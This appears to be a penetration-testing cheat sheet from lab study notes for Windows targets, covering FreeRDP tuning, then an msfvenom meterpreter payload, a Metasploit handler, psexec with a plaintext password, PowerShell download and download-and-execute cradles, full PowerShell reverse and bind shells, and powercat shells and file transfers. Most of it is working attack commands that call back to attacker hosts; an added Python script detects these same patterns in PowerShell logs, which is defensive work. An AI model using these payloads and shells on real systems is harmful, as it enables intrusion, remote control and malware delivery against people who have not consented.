Windows

FreeRDP over limited bandwidth

/clipboard
enable bidirectional clipboard
/bpp:8
uses 256 colors: low quality, but a real speed improvement. May not display video (e.g. VLC); try /bpp:16 if that is a problem.
/bpp:16
uses 65536 colors, saving bandwidth over 24-bit color with negligible visible difference for most basic uses.
/network:modem /compression
reduce bandwidth via compression (trades CPU usage for network bandwidth)
-themes -wallpaper
great speedup by not needlessly sending background graphics repeatedly
/async-update /async-input
stop RDP from waiting for screen updates to reach you before it accepts input. These allow clicking ahead of the screen updates. Be careful not to click unwanted options while the screen is lagging behind.
-glyph-cache
disable glyph caching. Note: this can cause garbled characters and radio boxes.
/audio-mode:1
disable FreeRDP audio redirection (do not play sound from remote PC)
/auto-reconnect
automatically reconnect on failure (also works over SSH tunnel)
xfreerdp /clipboard /async-update /async-input /auto-reconnect /audio-mode:1 -glyph-cache /bpp:8 /network:modem /compression -themes -wallpaper /u:student /p:lab /cert:ignore /v:192.168.232.10 /workarea

Generate the reverse TCP client

msfvenom -p windows/meterpreter/reverse_tcp -a x86 \
    --encoder x86/shikata_ga_nai LHOST=10.9.0.21 LPORT=4446 -f exe -o hey.exe

Metasploit reverse TCP listener

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.0.21
set lport 4446
exploit
run post/multi/recon/local_exploit_suggester
run post/windows/gather/enum_applications

Get a remote shell

python psexec.py gatekeeper/mayor:[email protected] cmd.exe

Download a file

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.9.0.21:8000/hey.exe', 'hey.exe')"
powershell -Command "Invoke-WebRequest http://www.example.com/package.zip -OutFile package.zip"

Various tips and tricks

echo %username%

C:\Windows\Temp is often world writable

List privileges

whoami /priv

If the SeImpersonate privilege is enabled, try PrintSpoofer

PowerShell File Transfers

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"

PowerShell Reverse Shell

# Connect back to the listener and get the network stream
$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);
$stream = $client.GetStream();
# 64 KiB receive buffer
[byte[]]$bytes = 0..65535|%{0};
# Read commands until the connection closes
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
    # Decode the received bytes, run them, and capture output and errors
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    # Append a prompt showing the current directory and send the result back
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
}
$client.Close();

One-liner:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

PowerShell bind shell

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
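Added example, not part of the original notes: a small Python detector that scans PowerShell script-block log text (the kind Event ID 4104 script block logging produces) for the TCPClient/GetStream/iex reverse-shell pattern, the TcpListener bind-shell pattern, and the WebClient download and download-and-execute commands shown on this page. The log lines and the rule names are constructed for the demonstration, not real captures.

```python
import re

# Constructed sample script-block log lines for demonstration (not real captures).
# Index 0 mirrors the reverse shell above, 1 the bind shell, 2 a download-and-execute
# cradle, 3 a benign admin command, and 4 a plain file download.
SAMPLE_SCRIPT_BLOCKS = [
    "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);"
    "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String);",
    "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);"
    "$listener.start();$client = $listener.AcceptTcpClient();",
    "iex (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/powercat.ps1')",
    "Get-ChildItem C:\\Windows\\Temp | Where-Object { $_.Length -gt 1MB }",
    "(New-Object Net.WebClient).DownloadFile('http://10.11.0.4:8000/tool.exe','tool.exe')",
]

# Each rule lists regexes that must ALL appear (case-insensitive) in one script block.
# Requiring the combination, not a single keyword, keeps false positives down.
RULES = {
    "reverse_shell": [r"Sockets\.TCPClient", r"\.GetStream\(\)", r"\b(iex|Invoke-Expression)\b"],
    "bind_shell": [r"Sockets\.TcpListener", r"AcceptTcpClient"],
    "download_cradle": [r"\b(iex|Invoke-Expression)\b", r"DownloadString"],
    "file_download": [r"WebClient", r"DownloadFile"],
}

# Pulls the callback host and port out of a TCPClient('host',port) construction.
ENDPOINT_RE = re.compile(r"TCPClient\(\s*'([^']+)'\s*,\s*(\d+)\s*\)", re.IGNORECASE)


def match_rules(block):
    """Return the names of every rule whose patterns all occur in the script block."""
    hits = []
    for name, patterns in RULES.items():
        if all(re.search(p, block, re.IGNORECASE) for p in patterns):
            hits.append(name)
    return hits


def extract_endpoint(block):
    """Return (host, port) for a reverse-shell callback, or None if absent."""
    m = ENDPOINT_RE.search(block)
    return (m.group(1), int(m.group(2))) if m else None


def scan(blocks):
    """Map the index of each suspicious block to its rule hits; clean blocks are omitted."""
    return {i: hits for i, b in enumerate(blocks) if (hits := match_rules(b))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_SCRIPT_BLOCKS).items():
        print(idx, hits, extract_endpoint(SAMPLE_SCRIPT_BLOCKS[idx]))
```

The same rules apply unchanged to the one-liner forms, since the indicators are the .NET calls rather than the line layout.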

powercat

# /usr/share/windows-resources/powercat/powercat.ps1
# on target host
. .\powercat.ps1

# if possible, download powercat
iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

# file transfer attacker
sudo nc -lnvp 443 > receiving_powercat.ps1
# file transfer target
powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1

# reverse shell attacker
sudo nc -lvp 443
# reverse shell target
powercat -c 10.11.0.4 -p 443 -e cmd.exe

# bind shell target
powercat -l -p 443 -e cmd.exe
# bind shell attacker
nc 10.11.0.22 443
